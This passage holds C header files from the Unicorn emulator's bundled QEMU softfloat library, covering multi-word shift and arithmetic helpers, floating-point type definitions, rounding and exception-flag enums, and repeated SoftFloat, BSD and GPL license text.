SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ANY AND ALL LOSSES, COSTS, OR OTHER PROBLEMS ARISING FROM ITS USE. Derivative works are acceptable, even for commercial purposes, so long as (1) they include prominent notice that the work is derivative, and (2) they include prominent notice akin to these four paragraphs for those parts of this code that are retained. =============================================================================== */ /* BSD licensing: * Copyright (c) 2006, Fabrice Bellard * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * 3. Neither the name of the copyright holder nor the names of its contributors * may be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGE. */ /* Portions of this work are licensed under the terms of the GNU GPL, * version 2 or later. See the COPYING file in the top-level directory. */ #ifndef FPU_SOFTFLOAT_MACROS_H #define FPU_SOFTFLOAT_MACROS_H #include "fpu/softfloat-types.h" /*---------------------------------------------------------------------------- | Shifts `a' right by the number of bits given in `count'. If any nonzero | bits are shifted off, they are ``jammed'' into the least significant bit of | the result by setting the least significant bit to 1. The value of `count' | can be arbitrarily large; in particular, if `count' is greater than 32, the | result will be either 0 or 1, depending on whether `a' is zero or nonzero. | The result is stored in the location pointed to by `zPtr'. *----------------------------------------------------------------------------*/ static inline void shift32RightJamming(uint32_t a, int count, uint32_t *zPtr) { uint32_t z; if ( count == 0 ) { z = a; } else if ( count < 32 ) { z = ( a>>count ) | ( ( a<<( ( - count ) & 31 ) ) != 0 ); } else { z = ( a != 0 ); } *zPtr = z; } /*---------------------------------------------------------------------------- | Shifts `a' right by the number of bits given in `count'. If any nonzero | bits are shifted off, they are ``jammed'' into the least significant bit of | the result by setting the least significant bit to 1. The value of `count' | can be arbitrarily large; in particular, if `count' is greater than 64, the | result will be either 0 or 1, depending on whether `a' is zero or nonzero. | The result is stored in the location pointed to by `zPtr'. *----------------------------------------------------------------------------*/ static inline void shift64RightJamming(uint64_t a, int count, uint64_t *zPtr) { uint64_t z; if ( count == 0 ) { z = a; } else if ( count < 64 ) { z = ( a>>count ) | ( ( a<<( ( - count ) & 63 ) ) != 0 ); } else { z = ( a != 0 ); } *zPtr = z; } /*---------------------------------------------------------------------------- | Shifts the 128-bit value formed by concatenating `a0' and `a1' right by 64 | _plus_ the number of bits given in `count'. The shifted result is at most | 64 nonzero bits; this is stored at the location pointed to by `z0Ptr'. The | bits shifted off form a second 64-bit result as follows: The _last_ bit | shifted off is the most-significant bit of the extra result, and the other | 63 bits of the extra result are all zero if and only if _all_but_the_last_ | bits shifted off were all zero. This extra result is stored in the location | pointed to by `z1Ptr'. The value of `count' can be arbitrarily large. | (This routine makes more sense if `a0' and `a1' are considered to form a | fixed-point value with binary point between `a0' and `a1'. This fixed-point | value is shifted right by the number of bits given in `count', and the | integer part of the result is returned at the location pointed to by | `z0Ptr'. 
The fractional part of the result may be slightly corrupted as | described above, and is returned at the location pointed to by `z1Ptr'.) *----------------------------------------------------------------------------*/ static inline void shift64ExtraRightJamming( uint64_t a0, uint64_t a1, int count, uint64_t *z0Ptr, uint64_t *z1Ptr) { uint64_t z0, z1; int8_t negCount = ( - count ) & 63; if ( count == 0 ) { z1 = a1; z0 = a0; } else if ( count < 64 ) { z1 = ( a0<<negCount ) | ( a1 != 0 ); z0 = a0>>count; } else { if ( count == 64 ) { z1 = a0 | ( a1 != 0 ); } else { z1 = ( ( a0 | a1 ) != 0 ); } z0 = 0; } *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Shifts the 128-bit value formed by concatenating `a0' and `a1' right by the | number of bits given in `count'. Any bits shifted off are lost. The value | of `count' can be arbitrarily large; in particular, if `count' is greater | than 128, the result will be 0. The result is broken into two 64-bit pieces | which are stored at the locations pointed to by `z0Ptr' and `z1Ptr'. *----------------------------------------------------------------------------*/ static inline void shift128Right( uint64_t a0, uint64_t a1, int count, uint64_t *z0Ptr, uint64_t *z1Ptr) { uint64_t z0, z1; int8_t negCount = ( - count ) & 63; if ( count == 0 ) { z1 = a1; z0 = a0; } else if ( count < 64 ) { z1 = ( a0<<negCount ) | ( a1>>count ); z0 = a0>>count; } else { z1 = (count < 128) ? (a0 >> (count & 63)) : 0; z0 = 0; } *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Shifts the 128-bit value formed by concatenating `a0' and `a1' right by the | number of bits given in `count'. If any nonzero bits are shifted off, they | are ``jammed'' into the least significant bit of the result by setting the | least significant bit to 1. The value of `count' can be arbitrarily large; | in particular, if `count' is greater than 128, the result will be either | 0 or 1, depending on whether the concatenation of `a0' and `a1' is zero or | nonzero. The result is broken into two 64-bit pieces which are stored at | the locations pointed to by `z0Ptr' and `z1Ptr'. *----------------------------------------------------------------------------*/ static inline void shift128RightJamming( uint64_t a0, uint64_t a1, int count, uint64_t *z0Ptr, uint64_t *z1Ptr) { uint64_t z0, z1; int8_t negCount = ( - count ) & 63; if ( count == 0 ) { z1 = a1; z0 = a0; } else if ( count < 64 ) { z1 = ( a0<<negCount ) | ( a1>>count ) | ( ( a1<<negCount ) != 0 ); z0 = a0>>count; } else { if ( count == 64 ) { z1 = a0 | ( a1 != 0 ); } else if ( count < 128 ) { z1 = ( a0>>( count & 63 ) ) | ( ( ( a0<<negCount ) | a1 ) != 0 ); } else { z1 = ( ( a0 | a1 ) != 0 ); } z0 = 0; } *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Shifts the 192-bit value formed by concatenating `a0', `a1', and `a2' right | by 64 _plus_ the number of bits given in `count'. The shifted result is | at most 128 nonzero bits; these are broken into two 64-bit pieces which are | stored at the locations pointed to by `z0Ptr' and `z1Ptr'. The bits shifted | off form a third 64-bit result as follows: The _last_ bit shifted off is | the most-significant bit of the extra result, and the other 63 bits of the | extra result are all zero if and only if _all_but_the_last_ bits shifted off | were all zero. This extra result is stored in the location pointed to by | `z2Ptr'. 
The value of `count' can be arbitrarily large. | (This routine makes more sense if `a0', `a1', and `a2' are considered | to form a fixed-point value with binary point between `a1' and `a2'. This | fixed-point value is shifted right by the number of bits given in `count', | and the integer part of the result is returned at the locations pointed to | by `z0Ptr' and `z1Ptr'. The fractional part of the result may be slightly | corrupted as described above, and is returned at the location pointed to by | `z2Ptr'.) *----------------------------------------------------------------------------*/ static inline void shift128ExtraRightJamming( uint64_t a0, uint64_t a1, uint64_t a2, int count, uint64_t *z0Ptr, uint64_t *z1Ptr, uint64_t *z2Ptr ) { uint64_t z0, z1, z2; int8_t negCount = ( - count ) & 63; if ( count == 0 ) { z2 = a2; z1 = a1; z0 = a0; } else { if ( count < 64 ) { z2 = a1<<negCount; z1 = ( a0<<negCount ) | ( a1>>count ); z0 = a0>>count; } else { if ( count == 64 ) { z2 = a1; z1 = a0; } else { a2 |= a1; if ( count < 128 ) { z2 = a0<<negCount; z1 = a0>>( count & 63 ); } else { z2 = ( count == 128 ) ? a0 : ( a0 != 0 ); z1 = 0; } } z0 = 0; } z2 |= ( a2 != 0 ); } *z2Ptr = z2; *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Shifts the 128-bit value formed by concatenating `a0' and `a1' left by the | number of bits given in `count'. Any bits shifted off are lost. The value | of `count' must be less than 64. The result is broken into two 64-bit | pieces which are stored at the locations pointed to by `z0Ptr' and `z1Ptr'. *----------------------------------------------------------------------------*/ static inline void shortShift128Left(uint64_t a0, uint64_t a1, int count, uint64_t *z0Ptr, uint64_t *z1Ptr) { *z1Ptr = a1 << count; *z0Ptr = count == 0 ? a0 : (a0 << count) | (a1 >> (-count & 63)); } /*---------------------------------------------------------------------------- | Shifts the 128-bit value formed by concatenating `a0' and `a1' left by the | number of bits given in `count'. Any bits shifted off are lost. The value | of `count' may be greater than 64. The result is broken into two 64-bit | pieces which are stored at the locations pointed to by `z0Ptr' and `z1Ptr'. *----------------------------------------------------------------------------*/ static inline void shift128Left(uint64_t a0, uint64_t a1, int count, uint64_t *z0Ptr, uint64_t *z1Ptr) { if (count < 64) { *z1Ptr = a1 << count; *z0Ptr = count == 0 ? a0 : (a0 << count) | (a1 >> (-count & 63)); } else { *z1Ptr = 0; *z0Ptr = a1 << (count - 64); } } /*---------------------------------------------------------------------------- | Shifts the 192-bit value formed by concatenating `a0', `a1', and `a2' left | by the number of bits given in `count'. Any bits shifted off are lost. | The value of `count' must be less than 64. The result is broken into three | 64-bit pieces which are stored at the locations pointed to by `z0Ptr', | `z1Ptr', and `z2Ptr'. 
*----------------------------------------------------------------------------*/ static inline void shortShift192Left( uint64_t a0, uint64_t a1, uint64_t a2, int count, uint64_t *z0Ptr, uint64_t *z1Ptr, uint64_t *z2Ptr ) { uint64_t z0, z1, z2; int8_t negCount; z2 = a2<<count; z1 = a1<<count; z0 = a0<<count; if ( 0 < count ) { negCount = ( ( - count ) & 63 ); z1 |= a2>>negCount; z0 |= a1>>negCount; } *z2Ptr = z2; *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Adds the 128-bit value formed by concatenating `a0' and `a1' to the 128-bit | value formed by concatenating `b0' and `b1'. Addition is modulo 2^128, so | any carry out is lost. The result is broken into two 64-bit pieces which | are stored at the locations pointed to by `z0Ptr' and `z1Ptr'. *----------------------------------------------------------------------------*/ static inline void add128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1, uint64_t *z0Ptr, uint64_t *z1Ptr ) { uint64_t z1; z1 = a1 + b1; *z1Ptr = z1; *z0Ptr = a0 + b0 + ( z1 < a1 ); } /*---------------------------------------------------------------------------- | Adds the 192-bit value formed by concatenating `a0', `a1', and `a2' to the | 192-bit value formed by concatenating `b0', `b1', and `b2'. Addition is | modulo 2^192, so any carry out is lost. The result is broken into three | 64-bit pieces which are stored at the locations pointed to by `z0Ptr', | `z1Ptr', and `z2Ptr'. *----------------------------------------------------------------------------*/ static inline void add192( uint64_t a0, uint64_t a1, uint64_t a2, uint64_t b0, uint64_t b1, uint64_t b2, uint64_t *z0Ptr, uint64_t *z1Ptr, uint64_t *z2Ptr ) { uint64_t z0, z1, z2; int8_t carry0, carry1; z2 = a2 + b2; carry1 = ( z2 < a2 ); z1 = a1 + b1; carry0 = ( z1 < a1 ); z0 = a0 + b0; z1 += carry1; z0 += ( z1 < carry1 ); z0 += carry0; *z2Ptr = z2; *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Subtracts the 128-bit value formed by concatenating `b0' and `b1' from the | 128-bit value formed by concatenating `a0' and `a1'. Subtraction is modulo | 2^128, so any borrow out (carry out) is lost. The result is broken into two | 64-bit pieces which are stored at the locations pointed to by `z0Ptr' and | `z1Ptr'. *----------------------------------------------------------------------------*/ static inline void sub128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1, uint64_t *z0Ptr, uint64_t *z1Ptr ) { *z1Ptr = a1 - b1; *z0Ptr = a0 - b0 - ( a1 < b1 ); } /*---------------------------------------------------------------------------- | Subtracts the 192-bit value formed by concatenating `b0', `b1', and `b2' | from the 192-bit value formed by concatenating `a0', `a1', and `a2'. | Subtraction is modulo 2^192, so any borrow out (carry out) is lost. The | result is broken into three 64-bit pieces which are stored at the locations | pointed to by `z0Ptr', `z1Ptr', and `z2Ptr'. 
*----------------------------------------------------------------------------*/ static inline void sub192( uint64_t a0, uint64_t a1, uint64_t a2, uint64_t b0, uint64_t b1, uint64_t b2, uint64_t *z0Ptr, uint64_t *z1Ptr, uint64_t *z2Ptr ) { uint64_t z0, z1, z2; int8_t borrow0, borrow1; z2 = a2 - b2; borrow1 = ( a2 < b2 ); z1 = a1 - b1; borrow0 = ( a1 < b1 ); z0 = a0 - b0; z0 -= ( z1 < borrow1 ); z1 -= borrow1; z0 -= borrow0; *z2Ptr = z2; *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Multiplies `a' by `b' to obtain a 128-bit product. The product is broken | into two 64-bit pieces which are stored at the locations pointed to by | `z0Ptr' and `z1Ptr'. *----------------------------------------------------------------------------*/ static inline void mul64To128( uint64_t a, uint64_t b, uint64_t *z0Ptr, uint64_t *z1Ptr ) { uint32_t aHigh, aLow, bHigh, bLow; uint64_t z0, zMiddleA, zMiddleB, z1; aLow = a; aHigh = a>>32; bLow = b; bHigh = b>>32; z1 = ( (uint64_t) aLow ) * bLow; zMiddleA = ( (uint64_t) aLow ) * bHigh; zMiddleB = ( (uint64_t) aHigh ) * bLow; z0 = ( (uint64_t) aHigh ) * bHigh; zMiddleA += zMiddleB; z0 += ( ( (uint64_t) ( zMiddleA < zMiddleB ) )<<32 ) + ( zMiddleA>>32 ); zMiddleA <<= 32; z1 += zMiddleA; z0 += ( z1 < zMiddleA ); *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Multiplies the 128-bit value formed by concatenating `a0' and `a1' by | `b' to obtain a 192-bit product. The product is broken into three 64-bit | pieces which are stored at the locations pointed to by `z0Ptr', `z1Ptr', and | `z2Ptr'. *----------------------------------------------------------------------------*/ static inline void mul128By64To192( uint64_t a0, uint64_t a1, uint64_t b, uint64_t *z0Ptr, uint64_t *z1Ptr, uint64_t *z2Ptr ) { uint64_t z0, z1, z2, more1; mul64To128( a1, b, &z1, &z2 ); mul64To128( a0, b, &z0, &more1 ); add128( z0, more1, 0, z1, &z0, &z1 ); *z2Ptr = z2; *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Multiplies the 128-bit value formed by concatenating `a0' and `a1' to the | 128-bit value formed by concatenating `b0' and `b1' to obtain a 256-bit | product. The product is broken into four 64-bit pieces which are stored at | the locations pointed to by `z0Ptr', `z1Ptr', `z2Ptr', and `z3Ptr'. *----------------------------------------------------------------------------*/ static inline void mul128To256( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1, uint64_t *z0Ptr, uint64_t *z1Ptr, uint64_t *z2Ptr, uint64_t *z3Ptr ) { uint64_t z0, z1, z2, z3; uint64_t more1, more2; mul64To128( a1, b1, &z2, &z3 ); mul64To128( a1, b0, &z1, &more2 ); add128( z1, more2, 0, z2, &z1, &z2 ); mul64To128( a0, b0, &z0, &more1 ); add128( z0, more1, 0, z1, &z0, &z1 ); mul64To128( a0, b1, &more1, &more2 ); add128( more1, more2, 0, z2, &more1, &z2 ); add128( z0, z1, 0, more1, &z0, &z1 ); *z3Ptr = z3; *z2Ptr = z2; *z1Ptr = z1; *z0Ptr = z0; } /*---------------------------------------------------------------------------- | Returns an approximation to the 64-bit integer quotient obtained by dividing | `b' into the 128-bit value formed by concatenating `a0' and `a1'. The | divisor `b' must be at least 2^63. If q is the exact quotient truncated | toward zero, the approximation returned lies between q and q + 2 inclusive. | If the exact quotient q is larger than 64 bits, the maximum positive 64-bit | unsigned integer is returned. 
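| For a concrete, illustrative check (not part of the original comment):
| estimateDiv128To64(1, 0, UINT64_C(1) << 63) divides 2^64 by 2^63 and
| returns 2, which in this case is the exact quotient.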
*----------------------------------------------------------------------------*/ static inline uint64_t estimateDiv128To64(uint64_t a0, uint64_t a1, uint64_t b) { uint64_t b0, b1; uint64_t rem0, rem1, term0, term1; uint64_t z; if ( b <= a0 ) return UINT64_C(0xFFFFFFFFFFFFFFFF); b0 = b>>32; z = ( b0<<32 <= a0 ) ? UINT64_C(0xFFFFFFFF00000000) : ( a0 / b0 )<<32; mul64To128( b, z, &term0, &term1 ); sub128( a0, a1, term0, term1, &rem0, &rem1 ); while ( ( (int64_t) rem0 ) < 0 ) { z -= UINT64_C(0x100000000); b1 = b<<32; add128( rem0, rem1, b0, b1, &rem0, &rem1 ); } rem0 = ( rem0<<32 ) | ( rem1>>32 ); z |= ( b0<<32 <= rem0 ) ? 0xFFFFFFFF : rem0 / b0; return z; } /* From the GNU Multi Precision Library - longlong.h __udiv_qrnnd * (https://gmplib.org/repo/gmp/file/tip/longlong.h) * * Licensed under the GPLv2/LGPLv3 */ static inline uint64_t udiv_qrnnd(uint64_t *r, uint64_t n1, uint64_t n0, uint64_t d) { #if defined(__x86_64__) && !defined(_MSC_VER) uint64_t q; asm ("divq %4" : "=a"(q), "=d"(*r) : "0"(n0), "1"(n1), "rm"(d)); return q; #elif defined(__s390x__) && !defined(__clang__) /* Need to use a TImode type to get an even register pair for DLGR. */ unsigned __int128 n = (unsigned __int128)n1 << 64 | n0; asm("dlgr %0, %1" : "+r"(n) : "r"(d)); *r = n >> 64; return n; #elif defined(_ARCH_PPC64) && defined(_ARCH_PWR7) /* From Power ISA 2.06, programming note for divdeu. */ uint64_t q1, q2, Q, r1, r2, R; asm("divdeu %0,%2,%4; divdu %1,%3,%4" : "=&r"(q1), "=r"(q2) : "r"(n1), "r"(n0), "r"(d)); r1 = -(q1 * d); /* low part of (n1<<64) - (q1 * d) */ r2 = n0 - (q2 * d); Q = q1 + q2; R = r1 + r2; if (R >= d || R < r2) { /* overflow implies R > d */ Q += 1; R -= d; } *r = R; return Q; #else uint64_t d0, d1, q0, q1, r1, r0, m; d0 = (uint32_t)d; d1 = d >> 32; r1 = n1 % d1; q1 = n1 / d1; m = q1 * d0; r1 = (r1 << 32) | (n0 >> 32); if (r1 < m) { q1 -= 1; r1 += d; if (r1 >= d) { if (r1 < m) { q1 -= 1; r1 += d; } } } r1 -= m; r0 = r1 % d1; q0 = r1 / d1; m = q0 * d0; r0 = (r0 << 32) | (uint32_t)n0; if (r0 < m) { q0 -= 1; r0 += d; if (r0 >= d) { if (r0 < m) { q0 -= 1; r0 += d; } } } r0 -= m; *r = r0; return (q1 << 32) | q0; #endif } /*---------------------------------------------------------------------------- | Returns an approximation to the square root of the 32-bit significand given | by `a'. Considered as an integer, `a' must be at least 2^31. If bit 0 of | `aExp' (the least significant bit) is 1, the integer returned approximates | 2^31*sqrt(`a'/2^31), where `a' is considered an integer. If bit 0 of `aExp' | is 0, the integer returned approximates 2^31*sqrt(`a'/2^30). In either | case, the approximation returned lies strictly within +/-2 of the exact | value. *----------------------------------------------------------------------------*/ static inline uint32_t estimateSqrt32(int aExp, uint32_t a) { static const uint16_t sqrtOddAdjustments[] = { 0x0004, 0x0022, 0x005D, 0x00B1, 0x011D, 0x019F, 0x0236, 0x02E0, 0x039C, 0x0468, 0x0545, 0x0631, 0x072B, 0x0832, 0x0946, 0x0A67 }; static const uint16_t sqrtEvenAdjustments[] = { 0x0A2D, 0x08AF, 0x075A, 0x0629, 0x051A, 0x0429, 0x0356, 0x029E, 0x0200, 0x0179, 0x0109, 0x00AF, 0x0068, 0x0034, 0x0012, 0x0002 }; int8_t index; uint32_t z; index = ( a>>27 ) & 15; if ( aExp & 1 ) { z = 0x4000 + ( a>>17 ) - sqrtOddAdjustments[ (int)index ]; z = ( ( a / z )<<14 ) + ( z<<15 ); a >>= 1; } else { z = 0x8000 + ( a>>17 ) - sqrtEvenAdjustments[ (int)index ]; z = a / z + z; z = ( 0x20000 <= z ) ? 
            0xFFFF8000 : ( z<<15 );
        if ( z <= a ) return (uint32_t) ( ( (int32_t) a )>>1 );
    }
    return ( (uint32_t) ( ( ( (uint64_t) a )<<31 ) / z ) ) + ( z>>1 );

}

/*----------------------------------------------------------------------------
| Returns 1 if the 128-bit value formed by concatenating `a0' and `a1'
| is equal to the 128-bit value formed by concatenating `b0' and `b1'.
| Otherwise, returns 0.
*----------------------------------------------------------------------------*/

static inline flag eq128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 )
{
    return ( a0 == b0 ) && ( a1 == b1 );
}

/*----------------------------------------------------------------------------
| Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' is less
| than or equal to the 128-bit value formed by concatenating `b0' and `b1'.
| Otherwise, returns 0.
*----------------------------------------------------------------------------*/

static inline flag le128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 )
{
    return ( a0 < b0 ) || ( ( a0 == b0 ) && ( a1 <= b1 ) );
}

/*----------------------------------------------------------------------------
| Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' is less
| than the 128-bit value formed by concatenating `b0' and `b1'.  Otherwise,
| returns 0.
*----------------------------------------------------------------------------*/

static inline flag lt128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 )
{
    return ( a0 < b0 ) || ( ( a0 == b0 ) && ( a1 < b1 ) );
}

/*----------------------------------------------------------------------------
| Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' is
| not equal to the 128-bit value formed by concatenating `b0' and `b1'.
| Otherwise, returns 0.
*----------------------------------------------------------------------------*/

static inline flag ne128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 )
{
    return ( a0 != b0 ) || ( a1 != b1 );
}

#endif

unicorn-2.1.1/qemu/include/fpu/softfloat-types.h

/*
 * QEMU float support
 *
 * The code in this source file is derived from release 2a of the SoftFloat
 * IEC/IEEE Floating-point Arithmetic Package. Those parts of the code (and
 * some later contributions) are provided under that license, as detailed below.
 * It has subsequently been modified by contributors to the QEMU Project,
 * so some portions are provided under:
 *  the SoftFloat-2a license
 *  the BSD license
 *  GPL-v2-or-later
 *
 * This header holds definitions for code that might be dealing with
 * softfloat types but not need access to the actual library functions.
 */

/*
===============================================================================
This C header file is part of the SoftFloat IEC/IEEE Floating-point
Arithmetic Package, Release 2a.

Written by John R. Hauser.  This work was made possible in part by the
International Computer Science Institute, located at Suite 600, 1947 Center
Street, Berkeley, California 94704.
Funding was partially provided by the
National Science Foundation under grant MIP-9311980.  The original version
of this code was written as part of a project to build a fixed-point vector
processor in collaboration with the University of California at Berkeley,
overseen by Profs. Nelson Morgan and John Wawrzynek.  More information
is available through the Web page
`http://HTTP.CS.Berkeley.EDU/~jhauser/ arithmetic/SoftFloat.html'.

THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE.  Although reasonable effort
has been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT
TIMES RESULT IN INCORRECT BEHAVIOR.  USE OF THIS SOFTWARE IS RESTRICTED TO
PERSONS AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ANY
AND ALL LOSSES, COSTS, OR OTHER PROBLEMS ARISING FROM ITS USE.

Derivative works are acceptable, even for commercial purposes, so long as
(1) they include prominent notice that the work is derivative, and (2) they
include prominent notice akin to these four paragraphs for those parts of
this code that are retained.

===============================================================================
*/

/* BSD licensing:
 * Copyright (c) 2006, Fabrice Bellard
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions are met:
 *
 * 1. Redistributions of source code must retain the above copyright notice,
 * this list of conditions and the following disclaimer.
 *
 * 2. Redistributions in binary form must reproduce the above copyright notice,
 * this list of conditions and the following disclaimer in the documentation
 * and/or other materials provided with the distribution.
 *
 * 3. Neither the name of the copyright holder nor the names of its contributors
 * may be used to endorse or promote products derived from this software without
 * specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
 * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
 * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
 * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
 * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
 * THE POSSIBILITY OF SUCH DAMAGE.
 */

/* Portions of this work are licensed under the terms of the GNU GPL,
 * version 2 or later. See the COPYING file in the top-level directory.
 */

#ifndef SOFTFLOAT_TYPES_H
#define SOFTFLOAT_TYPES_H

#include <stdint.h>

/* This 'flag' type must be able to hold at least 0 and 1. It should
 * probably be replaced with 'bool' but the uses would need to be audited
 * to check that they weren't accidentally relying on it being a larger type.
 */
typedef uint8_t flag;

/*
 * Software IEC/IEEE floating-point types.
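 *
 * These are plain integer typedefs holding raw IEEE bit patterns, so values
 * are built and inspected via the make_*/*_val macros below.  As an
 * illustrative note (not from the original header), make_float32(0x3f800000)
 * yields the bit pattern of 1.0f.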
 */
typedef uint16_t float16;
typedef uint32_t float32;
typedef uint64_t float64;
#define float16_val(x) (x)
#define float32_val(x) (x)
#define float64_val(x) (x)
#define make_float16(x) (x)
#define make_float32(x) (x)
#define make_float64(x) (x)
#define const_float16(x) (x)
#define const_float32(x) (x)
#define const_float64(x) (x)

typedef struct {
    uint64_t low;
    uint16_t high;
} floatx80;
#define make_floatx80(exp, mant) ((floatx80) { mant, exp })
#define make_floatx80_init(exp, mant) { .low = mant, .high = exp }

typedef struct {
#ifdef HOST_WORDS_BIGENDIAN
    uint64_t high, low;
#else
    uint64_t low, high;
#endif
} float128;
#define make_float128(high_, low_) ((float128) { .high = high_, .low = low_ })
#define make_float128_init(high_, low_) { .high = high_, .low = low_ }

/*
 * Software IEC/IEEE floating-point underflow tininess-detection mode.
 */

enum {
    float_tininess_after_rounding  = 0,
    float_tininess_before_rounding = 1
};

/*
 * Software IEC/IEEE floating-point rounding mode.
 */

enum {
    float_round_nearest_even = 0,
    float_round_down         = 1,
    float_round_up           = 2,
    float_round_to_zero      = 3,
    float_round_ties_away    = 4,
    /* Not an IEEE rounding mode: round to the closest odd mantissa value */
    float_round_to_odd       = 5,
};

/*
 * Software IEC/IEEE floating-point exception flags.
 */

enum {
    float_flag_invalid         =   1,
    float_flag_divbyzero       =   4,
    float_flag_overflow        =   8,
    float_flag_underflow       =  16,
    float_flag_inexact         =  32,
    float_flag_input_denormal  =  64,
    float_flag_output_denormal = 128
};

/*
 * Floating Point Status. Individual architectures may maintain
 * several versions of float_status for different functions. The
 * correct status for the operation is then passed by reference to
 * most of the softfloat functions.
 */

typedef struct float_status {
    signed char float_detect_tininess;
    signed char float_rounding_mode;
    uint8_t     float_exception_flags;
    signed char floatx80_rounding_precision;
    /* should denormalised results go to zero and set the inexact flag? */
    flag flush_to_zero;
    /* should denormalised inputs go to zero and set the input_denormal flag? */
    flag flush_inputs_to_zero;
    flag default_nan_mode;
    /* not always used -- see snan_bit_is_one() in softfloat-specialize.h */
    flag snan_bit_is_one;
} float_status;

#endif /* SOFTFLOAT_TYPES_H */

unicorn-2.1.1/qemu/include/fpu/softfloat.h

/*
 * QEMU float support
 *
 * The code in this source file is derived from release 2a of the SoftFloat
 * IEC/IEEE Floating-point Arithmetic Package. Those parts of the code (and
 * some later contributions) are provided under that license, as detailed below.
 * It has subsequently been modified by contributors to the QEMU Project,
 * so some portions are provided under:
 *  the SoftFloat-2a license
 *  the BSD license
 *  GPL-v2-or-later
 *
 * Any future contributions to this file after December 1st 2014 will be
 * taken to be licensed under the Softfloat-2a license unless specifically
 * indicated otherwise.
*/ /* =============================================================================== This C header file is part of the SoftFloat IEC/IEEE Floating-point Arithmetic Package, Release 2a. Written by John R. Hauser. This work was made possible in part by the International Computer Science Institute, located at Suite 600, 1947 Center Street, Berkeley, California 94704. Funding was partially provided by the National Science Foundation under grant MIP-9311980. The original version of this code was written as part of a project to build a fixed-point vector processor in collaboration with the University of California at Berkeley, overseen by Profs. Nelson Morgan and John Wawrzynek. More information is available through the Web page `http://HTTP.CS.Berkeley.EDU/~jhauser/ arithmetic/SoftFloat.html'. THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ANY AND ALL LOSSES, COSTS, OR OTHER PROBLEMS ARISING FROM ITS USE. Derivative works are acceptable, even for commercial purposes, so long as (1) they include prominent notice that the work is derivative, and (2) they include prominent notice akin to these four paragraphs for those parts of this code that are retained. =============================================================================== */ /* BSD licensing: * Copyright (c) 2006, Fabrice Bellard * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions 